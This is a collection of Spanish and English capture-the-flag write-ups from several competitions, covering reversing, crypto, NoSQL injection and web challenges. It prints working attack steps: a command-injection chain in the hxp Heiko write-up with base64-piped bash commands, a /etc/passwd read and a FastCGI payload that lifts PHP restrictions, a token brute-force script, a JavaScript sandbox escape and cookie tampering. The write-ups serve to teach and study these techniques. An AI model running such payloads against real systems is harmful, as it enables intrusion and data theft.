https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/img/flag.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/img/flag2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/img/flag2.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/img/reversing-arm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/img/reversing-arm.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/img/xrays.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/img/xrays.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/re1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/re1
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import angr
3 |
4 | p = angr.Project("re1", auto_load_libs=False)
5 |
6 | initial_state = p.factory.blank_state(addr=0x400658)
7 |
8 | class donothing(angr.SimProcedure):
9 | def run(self):
10 | pass
11 |
12 | p.hook(0x4070d0, donothing(), replace=True)
13 | p.hook(0x406ab0, donothing(), replace=True)
14 |
15 | loops = 0
16 | def check(state):
17 | global loops
18 | #print("[+] %s" % state)
19 | if state.ip.args[0] == 0x4008e8:
20 | return True
21 | elif state.ip.args[0] == 0x400858:
22 | loops += 1
23 | if loops >= 20:
24 | return True
25 |
26 | return False
27 |
28 | sm = p.factory.simulation_manager(initial_state)
29 |
30 | sm.one_active.options.add(angr.options.LAZY_SOLVES)
31 | #e = sm.explore(find=0x004008e8, avoid=0x00400844)
32 | e = sm.explore(find=check, avoid=0x400844)
33 | print(e)
34 |
35 | if len(e.found) > 0:
36 | s = e.found[0]
37 | sp = s.solver.eval(s.regs.sp)
38 | print("SP: %x" % sp)
39 | key = []
40 | for i in range(20):
41 | key.append(s.mem[sp+30288 + i].char.concrete.decode('utf-8'))
42 | print(''.join(key))
43 |
--------------------------------------------------------------------------------
/huawei-2018/07-cryptokenita/README.md:
--------------------------------------------------------------------------------
1 | # Huawei CTF 2018 - Reto 7 - CRYPTOKENITA
2 | ### Categoría: Criptografia
3 |
4 | En esto reto nos proporcionan el código fuente de *nodeJS* de la aplicación. El objetivo es encontrar un token correcto para obtener el flag.
5 |
6 | [source.js](huawei-crypto.js)
7 |
8 | En resumen, se genera un token de 8 bytes que tenemos que acertar y enviar codificado en base64.
9 |
10 | A continuación se muestran las partes más importantes/criticas de la aplicación.
11 |
12 | ```js
13 |
14 | function tokenGen() {
15 | return crypto.randomBytes(8).toString();
16 | }
17 |
18 | app.post('/guess', function (req, res, next) {
19 | var token = req.body.token;
20 | // No hack
21 | if(!_.isString(token) || !_.isBuffer(Buffer.from(token, 'base64')) || !_.isString(Buffer.from(token, 'base64').toString('utf8'))) {
22 | res.render('hacker', {title: title});
23 | return;
24 | }
25 |
26 | token = Buffer.from(token, 'base64').toString('utf8');
27 | if(req.session && req.session.token && req.session.token === token) {
28 | res.render('flag', {title: title, flag: config.flag});
29 | return;
30 | }
31 |
32 | res.render('no_flag', {title: title});
33 | });
34 | ```
35 |
36 | Si analizamos detalladamente el código observaremos que en la función *toString* utiliza *UTF8*. Esta codificación es multibyte y se utilizan 2 bytes para representar los caracteres 0x80 a 0xff, por lo que utilizar literalmente 0x80 a 0xff nos devuelve un error de codificación.
37 |
38 | 
39 |
40 | Sabiendo esto solo tenemos que probar múltiples veces con este valor no valido `0xffffffff` hasta conseguir la flag.
41 |
42 | ```python
43 | import urllib.parse
44 | import requests
45 |
46 | user_agent = 'Mozilla/5.0'
47 |
48 | for i in range(10000):
49 | headers = { 'User-Agent' : user_agent, 'Connection': 'keep-alive'}
50 | url = 'http://54.36.134.37:32009'
51 | r = requests.get(url, headers=headers)
52 | data = r.text
53 | print(urllib.parse.unquote(r.cookies['connect.sid']))
54 |
55 | url2 = 'http://54.36.134.37:32009/guess'
56 | headers = { 'User-Agent' : user_agent, 'Connection': 'keep-alive','Content-Type':'application/x-www-form-urlencoded'}
57 | headers['Cookie'] = 'connect.sid=' + r.cookies['connect.sid']
58 | r2 = requests.post(url2, data='token=//////////8', headers=headers)
59 | data2 = r2.text
60 | print(data2)
61 |
62 | if 'No flag' not in data2:
63 | break
64 | ```
65 |
66 | 
67 |
68 | 
69 |
--------------------------------------------------------------------------------
/huawei-2018/07-cryptokenita/huawei-crypto.js:
--------------------------------------------------------------------------------
1 | var express = require('express');
2 | var path = require('path');
3 | var cookieParser = require('cookie-parser');
4 | var logger = require('morgan');
5 | var crypto = require('crypto');
6 | var config = require('./config.js');
7 |
8 | var app = express();
9 |
10 | var session = require('express-session');
11 | var fs = require('fs');
12 | var _ = require('lodash');
13 |
14 | var title = "Adivina el token !";
15 |
16 | function tokenGen() {
17 | return crypto.randomBytes(8).toString();
18 | }
19 |
20 | var source = fs.readFileSync(__filename,{encoding:'utf-8'});
21 |
22 | // view engine setup
23 | app.set('views', path.join(__dirname, 'views'));
24 | app.set('view engine', 'jade');
25 |
26 | app.use(logger('dev'));
27 | app.use(express.json());
28 | app.use(express.urlencoded({extended: false}));
29 | app.use(cookieParser());
30 | app.use(express.static(path.join(__dirname, 'public')));
31 |
32 | app.use(session({
33 | secret: config.secret,
34 | resave: false,
35 | saveUninitialized: false,
36 | maxAge: 120,
37 | cookie: {}
38 | }));
39 |
40 | app.get('/', function (req, res, next) {
41 | if (!req.session.token) {
42 | req.session.token = tokenGen();
43 | req.session.save();
44 | }
45 | res.render('index', {title: title});
46 | });
47 |
48 | app.get('/source', function (req, res, next) {
49 | res.setHeader('Content-Type', 'text/javascript');
50 | res.send(source);
51 | });
52 | app.post('/guess', function (req, res, next) {
53 | var token = req.body.token;
54 | // No hack
55 | if(!_.isString(token) || !_.isBuffer(Buffer.from(token, 'base64')) || !_.isString(Buffer.from(token, 'base64').toString('utf8'))) {
56 | res.render('hacker', {title: title});
57 | return;
58 | }
59 |
60 | token = Buffer.from(token, 'base64').toString('utf8');
61 | if(req.session && req.session.token && req.session.token === token) {
62 | res.render('flag', {title: title, flag: config.flag});
63 | return;
64 | }
65 |
66 | res.render('no_flag', {title: title});
67 | });
68 |
69 | // No hack
70 | app.use(function (req, res, next) {
71 | res.render('hacker',{title: title});
72 | });
73 |
74 | module.exports = app;
--------------------------------------------------------------------------------
/huawei-2018/07-cryptokenita/img/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/07-cryptokenita/img/flag.png
--------------------------------------------------------------------------------
/huawei-2018/07-cryptokenita/img/flag2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/07-cryptokenita/img/flag2.png
--------------------------------------------------------------------------------
/huawei-2018/07-cryptokenita/img/utf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/07-cryptokenita/img/utf.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/admin-panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/admin-panel.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/flag.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/hash-cracking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/hash-cracking.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/login-getter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/login-getter.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/login.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/loginadmin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/loginadmin.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/sqli-adminpassword.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/sqli-adminpassword.png
--------------------------------------------------------------------------------
/huawei-2018/08-login-denoid/img/sqli-glob-size.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/08-login-denoid/img/sqli-glob-size.png
--------------------------------------------------------------------------------
/hxp-2020/heiko/README.md:
--------------------------------------------------------------------------------
1 | # hxp CTF 2020 - Heiko
2 | ## Web - 244 points
3 |
4 | 
5 |
6 | [App source](index.php)
7 |
8 | According to the challenge files, the flag is in a randomly generated file `/flag_[a-zA-Z0-9]{24}.txt`.
9 |
10 | ```php
11 | $arg = escapeshellcmd($arg); // Pass spaces through. Otherwise, we can't 'man git diff'
12 | $manpage = shell_exec('/usr/bin/man --troff-device=html --encoding=UTF-8 ' . $arg);
13 | ```
14 | ### Invalid characters bypass
15 |
16 | Using a character between *0x80* and *0xff* we can skip the first restriction.
17 |
18 | In addition, the function `escapeshellcmd` eliminates this character and does not disturb us.
19 |
20 | For example, this request returns the contents of the passwd file.
21 |
22 | `?page=%ff/etc/passwd`
23 |
24 | ### RCE
25 |
26 | After a while looking for a way to execute commands, we get to execute code, it should be noted that the order of the parameters matters.
27 |
28 | `?page=%ff--html=bash --troff-device=latin1 /proc/self/cmdline ;sleep${IFS}5`
29 |
30 | ### Trying to access /flag*
31 | * Using bash
32 | `--html=bash .... ;echo${IFS}Y2F0IC9mbGFnKiAyPj4vdG1wL2Vycm9yICAgPj4vdG1wL3BhdGF0YWZsYWcy|base64${IFS}-d|bash`
33 | * Using PHP
34 | `--html=php .... ;`
35 |
36 | In both cases APPARMOR blocks us
37 |
38 | `audit: type=1400 ...: apparmor="DENIED" operation="open" profile="/usr/bin/man" name="/" pid=21653 comm="sh" requested_mask="r" denied_mask="r" fsuid=33 ouid=0`
39 |
40 | `cat: '/flag*': No such file or directory`
41 |
42 | ### apparmor/open_basedir bypass
43 |
44 | To get around these restrictions, we interact with the FastCGI socket of *php-fpm* to execute a PHP script.
45 |
46 | First we use the script [fastcgipacket.rb](https://raw.githubusercontent.com/ONsec-Lab/scripts/master/fastcgipacket.rb) and generate a payload in base64.
47 |
48 | ```ruby
49 | packet << FCGIRecord::Params.new( 1,
50 | "REQUEST_METHOD" => "GET",
51 | "SCRIPT_FILENAME" => "/tmp/patata.php",
52 | "PHP_VALUE" => "open_basedir=\"/\"",
53 | "PHP_ADMIN_VALUE" => "disable_functions=\"\""
54 | ).to_s
55 | ```
56 |
57 | ```sh
58 | AQEAAQAIAAAAAQAAAAAAAAEEAAEAcwMADgNSRVFVRVNUX01FVEhPREdFVA8PU0NSSVBUX0ZJTEVOQU1FL3RtcC9wYXRhdGEucGhwCRBQSFBfVkFMVUVvcGVuX2Jhc2VkaXI9Ii8iDxRQSFBfQURNSU5fVkFMVUVkaXNhYmxlX2Z1bmN0aW9ucz0iIgAAAAEEAAEAAAAAAQUAAQAAAAAK
59 | ```
60 |
61 | In addition, we upload a php script in the temporary directory by executing the following command, encoded in base64.
62 |
63 | `echo " /tmp/patataflag');?>" >/tmp/patata.php`
64 |
65 | `;echo${IFS}ZWNobyAiPD89c2hlbGxfZXhlYygnY2F0IC9mbGFnKiA%2bIC90bXAvcGF0YXRhZmxhZycpOz8%2bIiA%2bL3RtcC9wYXRhdGEucGhw|base64${IFS}-d|bash`
66 |
67 | Now we launch the query to FastCGI's socket with the following PHP code.
68 | The location of the PHP-fpm socket appears in the challenge's configuration files `/run/php/php7.3-fpm.sock`
69 |
70 | ```php
71 |
81 | ```
82 | We launch the following request, using `--html=php` and a script without spaces
83 | ```
84 | ?page=%ff--html%3dphp+--troff-device%3dlatin1+--nh+--no-subpages+/proc/self/cmdline+;
85 | ```
86 |
87 | ### Read Flag
88 | Once the flag has been copied to the temporary directory, we can read it directly from the website .
89 |
90 | `/?page=%ff/tmp/patataflag`
91 |
92 | `hxp{maybe_this_will_finally_get_me_that_sweet_VC_money$$$}`
93 |
--------------------------------------------------------------------------------
/hxp-2020/heiko/heiko-16fc430532ab60cc.tar.xz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hxp-2020/heiko/heiko-16fc430532ab60cc.tar.xz
--------------------------------------------------------------------------------
/hxp-2020/heiko/img/heiko.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hxp-2020/heiko/img/heiko.png
--------------------------------------------------------------------------------
/isitdtu-2019/EasyPHP/img/phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/isitdtu-2019/EasyPHP/img/phpinfo.jpg
--------------------------------------------------------------------------------
/isitdtu-2019/EasyPHP/img/readfile.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/isitdtu-2019/EasyPHP/img/readfile.jpg
--------------------------------------------------------------------------------
/isitdtu-2019/EasyPHP/img/scandir.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/isitdtu-2019/EasyPHP/img/scandir.jpg
--------------------------------------------------------------------------------
/kernel-2015/crypto300/README.md:
--------------------------------------------------------------------------------
1 | # Kernel 2015 - Crypto 300
2 |
3 | Para esta prueba tenemos 54 archivos de cartas con los siguientes números ordenados
4 |
5 | ```
6 | 48 52 B 09 10 11 51 16 20 21 14 06 26 27 28 05 08 33 34 35 36 37 38 39 40 41 42 43 44 45 13 30 25 29 15 A 50 12 07 31 32 04 17 46 47 03 22 23 24 49 01 18 19 02
7 | ```
8 |
9 | La clave a descifrar es `HBCNC DKARI OFVIC DISQ`
10 |
11 | Después de investigar llegamos a la conclusión de que nos encontramos ante el [cifrado Solitario](https://en.wikipedia.org/wiki/Solitaire_(cipher)) de la novela [Cryptonomicon](https://en.wikipedia.org/wiki/Cryptonomicon)
12 |
13 | Utilizamos este script de *Python* [https://www.schneier.com/code/sol.py] y lo modificamos para introducir el orden de nuestra baraja. Los comodines A y B los sustituimos por ’53’ y ’54’
14 |
15 | ```python
16 | deck = [48, 52, 54, 9, 10, .... 18, 19, 2]
17 | ```
18 |
19 | El resultado obtenido es `XBDQDVHLVQCJDNWQJLV`
20 |
21 | En este caso no hemos obtenido el mensaje correcto.
22 |
23 | Después de probar distintas combinaciones y verificar que el algoritmo fuera correcto se encontró la solución utilizando el script con la baraja inicial ordenada
24 |
25 | ```python
26 | deck = [1, 2, 3, .... 52, 53, 54]
27 | ```
28 |
29 | El mensaje es **DESPUESUNBUSCAMINAS**
30 |
31 | Una vez encontrada la solución, podemos observar como lo que nos ofrecía la prueba es el orden de la baraja después de cifrar el texto y simplemente hemos tenido suerte al encontrar la solucion con una baraja ordenada.
32 |
33 | Para resolver correctamente la prueba, necesitamos invertir el proceso de cifrado y reordenado de la baraja.
34 | Para ello he modificado el script inicial con esta nueva opción.
35 |
36 | [solitaire-inverse.py](https://gist.github.com/jesux/0a2d243b3fdcc8827adf)
37 |
--------------------------------------------------------------------------------
/kernel-2015/networking/README.md:
--------------------------------------------------------------------------------
1 | # Kernel 2015 - Networking
2 |
3 | En esta prueba nos dan un archivo .cap que contiene una comunicación USB entre el PC y varios dispositivos.
4 |
5 | Una de las cabeceras del archivo nos indica “USB packets with USBPcap header”
6 |
7 | 
8 |
9 | En un vistazo rápido al archivo podemos observar la dirección de los diferentes dispositivos conectados y analizando algunos paquetes hacernos una idea preliminar de lo que son cada uno
10 |
11 | host – El pc del usuario
12 | 1.1.x – Hub USB
13 | 1.2.x – USB Mass Storage
14 | 1.3.x – Keyboard Tracer Gamma Ivory
15 | Nos centraremos en los datos enviados por el teclado (1.3.1), para ello usaremos el filtro de wireshark usb.device_address==3
16 |
17 | 
18 |
19 | En esta captura podemos observar como el teclado envia el caracter 0x17
20 |
21 | Usando una tabla para traducir los scancodes a la tecla correspondiente
33 |
");
42 | }
43 | else {
44 | echo("Ping 127.0.0.1
34 |Recupera el contenido de flag.txt en el servidor
35 | 36 | Host is alive!Host is down!
");
45 | }
46 | }
47 | ?>
48 |
55 | 
11 | 
12 | ```
13 |
14 | Este parametro de la URL es vulnerable a NoSQL injection, ya que la aplicación utiliza una base de datos MongoDB.
15 |
16 | ### Scripts
17 |
18 | Con estos 3 scripts se automatiza el proceso de obtener cada caracter del objeto `this`. El primero lo hace probando entre una lista de caracteres, el segundo implementa threads para agilizar el proceso y finalmente el tercero hace una busqueda binaria y soporta threads.
19 |
20 | [MongoJojo.py](MongoJojo.py)
21 |
22 | [](https://asciinema.org/a/88573)
23 |
24 | [MongoJojo-threads.py](MongoJojo-threads.py)
25 |
26 | [](https://asciinema.org/a/88578)
27 |
28 | [MongoJojo-threads-bit.py](MongoJojo-threads-bit.py)
29 |
30 | [](https://asciinema.org/a/88871)
31 |
32 | ```
33 | { "_id" : ObjectId("57d6bc3c27913d21a0bbad41"), "user" : "MojoJojo", "password" : "bubbles{Ih4t3Sup3RG1rrrlz}", "avatar" : "mojo.png", "admin" : "YES" }
34 | ```
35 |
36 | ```
37 | {
38 | "_id" : ObjectId("57d6bc4727913d21a0bbad42"),
39 | "user" : "Burbuja",
40 | "password" : "1234",
41 | "avatar" : "burbuja.png",
42 | "admin" : "NO"
43 | }
44 |
45 | {
46 | "_id" : ObjectId("57d6bc5227913d21a0bbad43"),
47 | "user" : "Petalo",
48 | "password" : "gl00m",
49 | "avatar" : "petalo.png",
50 | "admin" : "NO"
51 | }
52 |
53 | {
54 | "_id" : ObjectId("57d6bc5c27913d21a0bbad44"),
55 | "user" : "Cactus",
56 | "password" : "CuidadoQueQuemo",
57 | "avatar" : "cactus.png",
58 | "admin" : "NO"
59 | }
60 |
61 | {
62 | "_id" : ObjectId("57d6bc3c27913d21a0bbad41"),
63 | "user" : "MojoJojo",
64 | "password" : "bubbles{Ih4t3Sup3RG1rrrlz}",
65 | "avatar" : "mojo.png",
66 | "admin" : "YES"
67 | }
68 | ```
69 |
--------------------------------------------------------------------------------
/navajanegra-2016/web1-mongojojo/img/mongojojo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/navajanegra-2016/web1-mongojojo/img/mongojojo.png
--------------------------------------------------------------------------------
/navajanegra-2016/web2-javascript/README.md:
--------------------------------------------------------------------------------
1 | # NavajaNegra 2016 – Web 2 – Javascript like a Ninja
2 |
3 | Una vez superada la primera prueba, deberíamos haber obtenido las credenciales del administrador MojoJojo.
4 |
5 | Así que el primer paso es ‘encontrar’ el panel de login y acceder: http://challenges.ka0labs.org:31337/login
6 |
7 | 
8 |
9 | Una vez dentro nos encontramos con un terminal llamado *MoJS* en el que podemos escribir instrucciones, al parecer en lenguaje *JavaScript*.
10 |
11 | 
12 |
13 | Si revisamos el código fuente de la página, podemos encontrar un comentario con información de como utilizar el terminal.
14 |
15 | ```
16 | Notes:
17 | Ok, with all that languages out there I sometimes forget my own =_=’
18 | Types: only integers to count
19 | Operations: addition with ‘+’
20 | Auxiliar functions: ‘help’
21 | Assign to ‘result’ to see output
22 | ```
23 |
24 | Con esta información ya deberíamos poder utilizar correctamente la terminal.
25 | Probamos con `result=help;` y obtenemos en pantalla la función help
26 |
27 |
28 | ```
29 | "function () { return execute.toString(); }"
30 | ```
31 |
32 | Si la ejecutamos con `result=help(0);` obtenemos el código de la función *execute*, que es la parte servidor, encargada de recibir las instrucciones que escribimos en el terminal.
33 |
34 | 
35 |
36 | Una vez asimilado el código, vemos como las variables que escribimos en el terminal se guardan en el Objeto *scope[sessId]*, también tenemos la restricción de no poder utilizar comillas y generar una cadena de texto o utilizar el carácter punto para lanzar un método.
37 |
38 | Una de las pistas nos recomienda utilizar prototypes y mutar el objeto, `Javascript objects have prototypes. Mutate the scope.`
39 |
40 | Tras innumerables pruebas, se consigue mutar a diferentes tipos, si mutamos a *Function* podemos utilizar constructor para crear una función propia.
41 |
42 | ```
43 | MoJS> __proto__=help;
44 | MoJS> result=constructor;
45 | "function Function() { [native code] }"
46 | MoJS> result=constructor(123456);
47 | "function anonymous() {\n123456\n}"
48 | ```
49 |
50 | Incluso somos capaces de ejecutar la función, aunque de momento es una función que no devuelve nada.
51 |
52 | ```
53 | MoJS> result=constructor(123456)(0);
54 | "undefined"
55 | ```
56 |
57 | Nuestro siguiente objetivo es generar un *String* definido por nosotros para incluirlo en una función y poder ejecutar código.
58 |
59 | Para ello mutamos a *String* utilizando la siguiente instrucción, es importante no haber mutado antes a *Function* para que funcione.
60 |
61 | ```
62 | MoJS> __proto__=constructor(help(0));
63 | "undefined"
64 | MoJS> result=constructor;
65 | "function String() { [native code] }"
66 | ```
67 |
68 | Por ultimo, mutamos a la clase *String*, donde tendremos acceso a la ansiada función *fromCharCode*.
69 |
70 | ```
71 | MoJS> result=constructor;
72 | "function Function() { [native code] }"
73 | MoJS> result=fromCharCode;
74 | "function fromCharCode() { [native code] }"
75 | ```
76 |
77 | Ahora solo nos falta codificar la instrucción JavaScript que queramos ejecutar en el servidor.
78 |
79 | Para ello necesitamos convertir nuestra instrucción a una secuencia de valores decimales y concatenarlos después de utilizar *fromCharCode* en cada uno de ellos. Por último, utilizamos `constructor(instruccion)(0);` para crear la función y ejecutarla.
80 |
81 | ```javascript
82 | return Object.keys(this);
83 |
84 | 114,101,116,117,114,110,32,79,98,106,101,99,116,46,107,101,121,115,40,116,104,105,115,41,59
85 |
86 | result=constructor(fromCharCode(114)+fromCharCode(101)+fromCharCode(116)+fromCharCode(117)+fromCharCode(114)+fromCharCode(110)+fromCharCode(32)+fromCharCode(79)+fromCharCode(98)+fromCharCode(106)+fromCharCode(101)+fromCharCode(99)+fromCharCode(116)+fromCharCode(46)+fromCharCode(107)+fromCharCode(101)+fromCharCode(121)+fromCharCode(115)+fromCharCode(40)+fromCharCode(116)+fromCharCode(104)+fromCharCode(105)+fromCharCode(115)+fromCharCode(41)+fromCharCode(59))(0);
87 |
88 | "execute,scope,fl4g"
89 | ```
90 |
91 | Finalmente repetimos el paso anterior y codificamos la instrucción *return fl4g;* para obtener el flag.
92 |
93 | ```javascript
94 | return fl4g;
95 | ```
96 |
97 | Aquí vemos la tres instrucciones necesarias para resolver la prueba
98 |
99 | 
100 |
--------------------------------------------------------------------------------
/navajanegra-2016/web2-javascript/img/mojojojo-execute.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/navajanegra-2016/web2-javascript/img/mojojojo-execute.png
--------------------------------------------------------------------------------
/navajanegra-2016/web2-javascript/img/mojojojo-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/navajanegra-2016/web2-javascript/img/mojojojo-login.png
--------------------------------------------------------------------------------
/navajanegra-2016/web2-javascript/img/mojojojo-solucion.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/navajanegra-2016/web2-javascript/img/mojojojo-solucion.png
--------------------------------------------------------------------------------
/navajanegra-2016/web2-javascript/img/mojojojo-terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/navajanegra-2016/web2-javascript/img/mojojojo-terminal.png
--------------------------------------------------------------------------------
/navajanegra-2019/Gamma-GPS/README.md:
--------------------------------------------------------------------------------
1 | ## Gamma-GPS - Web - 337 Points
2 |
3 | ```
4 | We are testing our new system. The Planet Express Ship will be able to trace the best route between 2 planets in a few seconds, but we are trying to make it secure first! It seems unbreakable, isn't it?
5 |
6 | http://gamma-gps.nn9ed.ka0labs.org/
7 |
8 | ```
9 |
10 | ### Login
11 | La web nos presenta un login de un entorno de Testing. Utilizamos credenciales comunes, consiguiendo acceder con `test:test`.
12 |
13 | 
14 |
15 |
16 | ### Aplicación Planet Express
17 | Una vez accedemos podemos navegar por varias paginas de la aplicación.
18 |
19 | 
20 |
21 | ### Devel Debug
22 |
23 | En el panel de Devel nos indica que solo se puede acceder en *modo debug*. Si analizamos la cookie de sesión, vemos que se trata de un serializado en base64.
24 |
25 | `a:2:{s:4:"user";s:4:"test";s:5:"debug";s:1:"0"}`
26 |
27 | Modificamos el valor de debug a '1' y volvemos a codificarlo en base64.
28 |
29 | ```php
30 | $search_term)
41 | {
42 | list($table, $column) = explode(':', $sql_column, 2);
43 |
44 | $stm = $dbh->prepare('SELECT `'. $column .'` FROM `'. $table .'` WHERE `'. $column .'` LIKE ? || "%"');
45 | $stm->bindValue(1, $search_term);
46 | $stm->execute();
47 | $res =$stm->fetchAll(PDO::FETCH_COLUMN);
48 |
49 | die(json_encode($res));
50 | }
51 |
52 |
53 | ?>
54 | ```
55 |
56 | 
57 |
58 | ### Bug en Autocompletado
59 |
60 | En el formulario para introducir los planetas de origen y destino existe una función de autocompletado, la cual utiliza el código que hemos obtenido previamente.
61 |
62 | 
63 |
64 |
65 | ### Bypass
66 | Una de las limitaciones en el código es no poder utilizar el caracter `_`.
67 |
68 | Al estar contenido en el nombre de una variable, PHP convierte algunos caracteres reservados a `_`. Podemos usar espacios, puntos, o la llave `[` una única vez.
69 |
70 |